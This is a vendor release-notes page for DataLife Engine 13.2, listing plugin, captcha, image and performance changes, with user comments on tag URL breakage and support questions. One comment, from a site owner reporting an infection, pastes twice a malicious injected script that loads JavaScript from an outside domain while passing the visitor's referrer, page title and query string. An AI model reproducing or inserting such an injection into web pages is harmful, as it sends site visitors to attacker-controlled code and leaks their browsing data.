Home / Releases / DataLife Engine v.13.2 Final Release
March 01 2019

DataLife Engine v.13.2 Final Release

celsoft 1 March 2019 Releases 6 537
10
DataLife Engine v.13.2 Final Release

The following changes have been prepared and implemented:

1. Domain transfer wizard is added. Now you can easily change you website domain. The wizard will automatically replace your domain in publications, comments, static pages, banners and user avatars. This wizard is launched from the control panel, in Engine Settings, next to the website address setting.

2. Now in the plugin system you can specify the executable PHP code which hooks to the plugin installation, update, enabling, disabling, and deletion events. It allows you to modify plugin behavior on specific actions.

3. Now in the plugin system you can specify string entries to start performing actions from in a file. For example, if there are several identical lines in the file and you need to perform specific action only starting from the second string entry, then you can specify this in the plugin.

4. Now in the plugin system you can specify that a certain plugin is required for correct work of another plugin. In plugin settings you can specify a name of another plugin that must be installed. In this case, this plugin will be executed after the execution of the main plugin. Thereby you can create add-ons not only for DLE itself, but also for plugins and create plugins for plugins.

5. In the plugin system line breaks are now performed correctly in the replaced code if it is at the very beginning of the code with which it should be replaced or added to.

6. Now you can use the {engine} tag for MySQL queries used in plugins, which indicates which MySQL engine DLE uses to create database tables. Values may be InnoDB or MyISAM.

7. Changes are made to the plugins installation and enabling system for cases when the plugin does not meet the requirements. For example, in cases when a plug-in requires a specific version of DLE, and the installed version of DLE does not match it, the plugin will still be installed but it will not be enabled. It allows a user to edit the plugin in the future, and make the necessary changes to it directly from Administration Panel. The same goes for the rest of plugin requirements. It will be possible to enable the plugin only if non-compatibility has been eliminated.

8. Standardization of the plugins execution order is added in the system. Plugins will be executed strictly according to the principle: the first added to the system is the first executed. Execution of plugins will be made regardless of whether the plugin has been edited in the Administration Panel or not. Also, if a plugin is dependent on another plugin, then the plugin on which it depends will be executed first.

9. Lazy image loading is added for publications. This feature can be enabled in the engine settings in the control panel. When this option is enabled, the images in the news will not be loaded by the browser on the page opening. They will be loaded as they are within browser’s viewport or nearby its borders. This feature allows you to improve the page loading speed and reduce the server load.

10. Now reCAPTCHA v3 is supported. With this type of captcha your users will no longer have to select any pictures and perform any additional actions on the site to verify themselves. The user is checked for being a bot or not in the background, unnoticed by your visitors. Before enabling this type of captcha, be sure to generate a new Google token key specifically for reCAPTCHA v3.

11. Now manual changes to .htaccess file located in the root of the site are kept in case of the engine auto-update. Contents of this file will not be completely replaced after the engine update. Only necessary changes will be made the in the standard functions. Thus, all manual changes made to it by the owner of the site will remain unchanged. The same is done for the cron file, which you configure to perform your actions on the cron.

12. Changes are made to the process of automatic engine update within the same major version. When patches with error corrections within the same version of the script are released, only installation of changes in the form of a patch will occur, updating only the changed files, not all the files as it was before.

13. Now a selected category can be automatically recognized in an article preview, and if a separate template is assigned to it, then a proper preview template will be loaded for this category. Thus, if different templates are assigned to different categories, all of them will be used in the preview.

14. Now you can use hints for links in Cross-Reference module in the control panel of the engine (title attribute). This feature allows you to improve SEO optimization, as well as improve the experience from your site for people with disabilities.

15. Now similar publications are automatically rebuilt when edited. When you edit an article, the engine automatically searches for similar news. Earlier in order to search for similar publications it was necessary to reset the cache of similar articles in the corresponding section of Administration Panel.

16. Now user bookmarks automatically synchronized in case of deletion of a publication from the site. If an article is removed from the site then it also is removed from bookmarks of all users and the user bookmarks counter is synchronized for these users.

17. Now magnet protocol is supported for links published using BB tags and in visual editors.

18. Now loading and processing images in WEBP format is supported. Images in this format can be directly uploaded using the DataLife Engine. The engine will create thumbnails and watermarks if necessary.

19. MySQL 8.x is supported.

20. PHP 7.3.x is supported.

21. Now you can specify several values separated by comma in [ifxfvalue tagname="tagvalue"] Text [/ifxfvalue] tag which shows the enclosed text if the tag value matches the specified value. For example, text within [ifxfvalue city="New York, Paris, London"] Text [/ifxfvalue] tag is shown only if an extra field named city contains one of specified values. It greatly simplifies the template layout for various cases.

22. Now there is a search for advertising materials management system in Administration Panel. You can search by name, description, and by the ad code.

23. A more informative visualization of whether a banner is displayed or not has been added in the banner management section of Administration Panel. For example, if a banner has display limitations by time, views or clicks, and the limit has already been reached, then in the banner editing section it will also be shown that the banner is currently off.

24. Now you can search by news and static pages on mobile devices (smartphones, tablets) in the engine control panel.

25. Now you can choose a search area in advanced static pages search. You can search either by all fields, or separately by name, description, and text of a static page.

26. Static pages search algorithms have been significantly improved. Now the search is more accurate, and gives you better results according to the specified search criteria.

27. The performance of DataLife Engine has been significantly improved and database load has been reduced when using multi-categories on the site. Requests to the database were re-implemented in such a way that they no longer use regular expressions when accessing the database, thereby significantly improving the speed of the engine and reducing server load.

28. The performance of DataLife Engine has been significantly improved and the database load has been reduced when displaying publications by keywords from the tag cloud.

29. The performance of DataLife Engine has been significantly improved and database load has been reduced when showing publications found with help of extra fields that have "use as cross-references" property.

30. Now you can quickly reset search parameters to default values for news and static pages advanced search.

31. The limit on the number of characters for Description meta tag for static pages has been increased to 300 characters. This limit now corresponds to the limit set by the Google search engine to display this information in search results.

32. Changes have been made to forming mechanisms of the og:image meta tag used for posting data to social networks. Now, if an article has an annotation, then this tag will form a link to the full original image. Thereby, social networks containing restrictions on the minimum image size will receive the maximum possible original image quality.

33. Control of incorrect friendly URLs when viewing publications based on a directory with the symbol code specified in the publications is added and control of incorrect friendly URLs of a full article is improved.

34. Added the ability to use commas when writing descriptions in extra fields of "image" and "image gallery" types.

35. Now you can use plus symbol as a value for extra fields of "Cross-references" type. For example, you can use values ​​such as C++.

36. Now such characters as double quotes, plus, and others are supported for keywords intended for a tag cloud of publications. Almost all restrictions are removed on characters in the cloud, leaving only restrictions on the use of HTML code.

37. For the RSS feed template, now you can use HTML code split into several lines, used to generate turbo content for Yandex.

38. Processing of transparent PNG images is improved. Application of watermarks for these images is also improved.

39. Added support for [newscount=X] text [/newscount] and [not-newscount=X] text [/not-newscount] tags for custom output of publications using {custom ...} tag in cases where this output is used in article annotation templates.

40. Now you can use space as a separator for list of cross-references in extra fields if "Use field values ​​as cross hyperlinks" option is enabled for these fields.

41. TinyMCE and Froala visual editors are updated. A number of detected errors is fixed in these editors.

42. An issue is fixed with the incorrect work of control system for incorrect friendly URLs for article extra fields of cross-reference type if the values ​​of these fields contained quotes.

43. An issue is fixed where articles sent to moderation could be displayed in bookmarks.

44. An issue is fixed with incorrectly displayed curly brackets in the comments when using the AJAX navigation for comments.

45. An issue is fixed where not all template tags of publication extra fields were correctly processed in the main.tpl template if a user visited a missing article.

46. An issue is fixed where {news-id} tags were incorrectly processed when displaying publications using {custom ...} tag if a user viewed a full article.

47. An issue with operation of [available ...] and [not-available ...] tags is fixed when a user is on a page of article by a symbol code, if the symbol code is not specified or is equal to zero "0".

48. An issue is fixed with the incorrect work of control system for incorrect friendly URLs in full articles if DLE was installed not in the site root directory.

49. An issue is fixed where articles planned for publishing in the future could be displayed when switching to following and previous articles, despite the fact that they set not to be displayed in the engine settings.

50. An issue is fixed where extra fields with gallery and image type could not be displayed when previewing an article if image descriptions were used in these fields.

51. Previously declared and recently found minor errors are fixed.

Link to the script downloading for customers:

Warning!

Attention! This information is only available to users with a valid license for DataLife Engine. If you have already purchased the script, you must log in with your account.

If you are not a customer, you can purchase the engine on our website.

Comments

  1. Patoghu (Visitors)

    2 March 2019 20:24 16 comments
    hi

    good and thanks

    Bug: Post tags Url Without + / old url tags Not Found if between tags url +
  2. celsoft (Administrators)

    4 March 2019 08:20 4 031 comment
    Quote: Patoghu
    Bug: Post tags Url Without + / old url tags Not Found if between tags url +

    Its not a bug, its different tags read the description of the release, item 35 and 36
  3. supremacy (Clients)

    6 March 2019 17:32 3 comments
    Türkçe/Turkish
    35 ve 36 nolu güncellemeler sonucunda, sitenizi güncellerseniz etiketlerinizin büyük bölümü hata verecek. Etiketlerde yer alan + çalışmıyor. Yani index almış /tags/türkçe+resimler/ şu hale geliyor /tags/türkçe%20resimler/ hali ile tonla 404 sahibi oluyorsunuz. Herkesi geliştirici sanıyor. Almayın bunların yazılımını falan filan. Adam rusça sayfasında bunun üzerine konuşacak bir şey yok diyor.

    celsoft
    35/36 sind grosses Problem für alt Webseite. Es gibt viele 404 sein. Keine Lösung. Die alles Leuten sind kein developer oder coder sein.

    35/36 are big problem for old website. There are many 404's. No solution. All people are not a developer or coder. Today I renewed the license and I only want my money.
  4. supremacy (Clients)

    6 March 2019 19:26 3 comments
    Thank you very much mirvasin you are a number.

    Tag url fix / Etiket url yapısı için fix
    /engine/classes/plugins.class.php
    add after line23

    if(isset($_GET['tag'])){
    $_GET['tag'] = str_replace(array('+',' '),'%20',$_GET['tag']);
    }


    celsoft,
    Can you see it? Very easy and I am happy. Thank you again mirvasin

  5. n3txpr1ng (Visitors)

    9 March 2019 20:05 1 comment
    hello, updated dle

    something wrong with keywords

    previously was so:
    mysite.com/tags/nice+day/

    it looks like this now:
    mysite.com/tags/nice day/


    how to get back to first option?
  6. dopstream (Visitors)

    11 March 2019 18:22 1 comment
    im update dle to 13.2 but !
    i have custom category in the main page
    when add a new article the article can't display in the main with the other article berfore update dle
    thanks in advance
  7. celsoft (Administrators)

    17 March 2019 13:42 4 031 comment
    Quote: n3txpr1ng
    how to get back to first option?

    DLE don't have settings for this

    Quote: dopstream
    im update dle to 13.2 but !
    i have custom category in the main page
    when add a new article the article can't display in the main with the other article berfore update dle
    thanks in advance

    contact with our support team https://dle-news.com/index.php?do=feedback
  8. ottoman25 (Visitors)

    29 June 2019 10:41 1 comment
    TR:

    Güncelleme yaptığımdan beri, kaynak kodlarıma aşağıdaki kod ekleniyor:

    <script type="application/jаvascript">
    document.write('<script type="application/jаvascript" src="https://yadro.su/6J9VC7?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm=script"><' + '/script>');
    </script>


    Bu kod, dbconfig.php dosyama bulaşmış.

    yadro.su ise reklam içeriyor ve sizin sitenize yönlendiriyor?

    EN:
    Since I've updated, the following code has been added to my source code:

    <script type="application/jаvascript">
    document.write('<script type="application/jаvascript" src="https://yadro.su/6J9VC7?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm=script"><' + '/script>');
    </script>


    This code is infected with my dbconfig.php file.

    yadro.su contains ads and redirects to your site?
  9. celsoft (Administrators)

    19 July 2019 14:19 4 031 comment
    Quote: ottoman25
    yadro.su contains ads and redirects to your site?

    No. We don't have ads or redirects in original DLE.
  10. burtonfly (Clients)

    27 September 2019 06:57 33 comments
    Please Make DataLife Engine Zapier App to can connect DLE with 1500+ apps for automate

Information

Users of Гости are not allowed to comment this publication.

Calendar

«    March 2024    »
MonTueWedThuFriSatSun
 123
45678910
11121314151617
18192021222324
25262728293031

Voting On The Website

Please, rate the engine